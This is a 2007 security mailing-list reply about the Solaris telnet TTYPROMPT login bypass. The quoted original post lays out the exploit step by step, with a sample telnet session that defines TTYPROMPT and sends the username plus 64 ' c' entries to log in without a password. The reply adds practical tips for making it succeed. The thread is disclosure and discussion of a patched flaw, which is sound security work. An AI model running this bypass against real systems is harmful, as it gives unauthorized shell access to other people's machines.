<<< Date Index >>>     <<< Thread Index >>>

RE: Re[2]: Solaris telnet vulnberability - how many on your network?



Fun ole exploit.

Of course, it doesn't have to be C's. I use numbers 1-9 and 0, repeated
so its easier to count 64 characters. It can be nearly any character, as
long as you have the spaces in between. It doesn't even have to be 64
characters all the time, but it normally has to be 64 or slightly more.
I've even messed up on the end portion, putting a / slash instead of a
backward slash, because I'm a Windows guy of course. It works every time
the way it is said below (with any character) though, but it is
forgiving at times. I've taugh this exploit hundreds of times to
students in Foundstone's Ultimate Hacking Expert class, and most
students mess it up the first time and it still often works. And of
course, you can use root if root is not prevented from doing remote
telnet logons.

Note, however, if you mess it up the first time, exit all the way back
out of telnet, and get back in, to begin again.

Roger

*******************************************************************
*Roger A. Grimes, Senior Security Consultant
*Microsoft Application Consulting and Engineering (ACE) Services  
*http://blogs.msdn.com/ace_team/default.aspx
*CPA, CISSP, MCSE: Security (2000/2003/MVP), CEH, yada...yada...
*email: roger@xxxxxxxxxxxxxx or rogrim@xxxxxxxxxxxxx
*******************************************************************


-----Original Message-----
From: Thierry Zoller [mailto:Thierry@xxxxxxxxx] 
Sent: Wednesday, February 21, 2007 1:58 PM
To: bugtraq@xxxxxxxxxxxxxxxxx
Cc: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re[2]: Solaris telnet vulnberability - how many on your
network?

Dear Marc,

This is hilarious, should there ever be a Top10 of the most weird bugs,
this surely is one of them, repost for pure amusement :

  Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
environment variable TTYPROMPT.  This vulnerability has already been
reported to BugTraq and a patch has been released by Sun.
  However, a very simple exploit, which does not require any code to be
compiled by an attacker, exists.  The exploit requires the attacker to
simply define the environment variable TTYPROMPT to a 6 character
string, inside telnet. I believe this overflows an integer inside login,
which specifies whether or not the user has been authenticated (just a
guess).
Once connected to the remote host, you must type the username, followed
by
64 " c"s, and a literal "\n".  You will then be logged in as the user
without any password authentication.  This should work with any account
except root (unless remote root login is allowed).

Example:

coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost

SunOS 5.8

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n Last
login: whenever $ whoami bin


--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7